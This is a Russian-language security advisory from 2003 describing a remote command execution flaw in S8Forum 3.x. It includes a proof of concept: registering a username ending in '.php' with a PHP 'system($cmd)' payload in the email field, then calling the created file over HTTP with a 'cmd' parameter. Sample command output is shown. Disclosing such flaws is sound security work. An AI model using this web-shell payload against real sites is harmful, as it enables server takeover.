Security Lab

Удаленное выполнение произвольных команд в S8Forum

Дата публикации:13.01.2003
Всего просмотров:1217
Опасность:
Высокая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: S8Forum 3.x
Описание: S8Forum (http://www.kellishaver.com/) уязвим к удаленному выполнению произвольных команд.

Когда пользователь регистрируется на форуме, локально создается файл с указанным именем пользователя с данными пользователя. В результате, злонамеренный пользователь может создать файл со злонамеренным именем и PHP (.php) расширением, который будет содержать злонамеренный PHP код. Этот файл может быть вызван через HTTP. Пример:

- go to Register

- insert in Username:
any_name.php   
NOTE: .php :)

- in password : any_pasword.

- in E-Mail:

<? system($cmd); ?>

or any code :(

- now go to  this URL:

http://sitename/s8forumfolder/users/any_name.php?cmd=uname%20-a

------ out ---

evil.php:c4ca4238a0b923820dcc509a6f75849b Linux
xxx.xxx.net 2.4.18 #2 SMP Mon Nov 18 16:50:02 CST 2002
i686 unknown 

------ out ---
Уязвимость обнаружена в Kelli Shaver S8Forum 3.0
Ссылки: A security vulnerability in S8Forum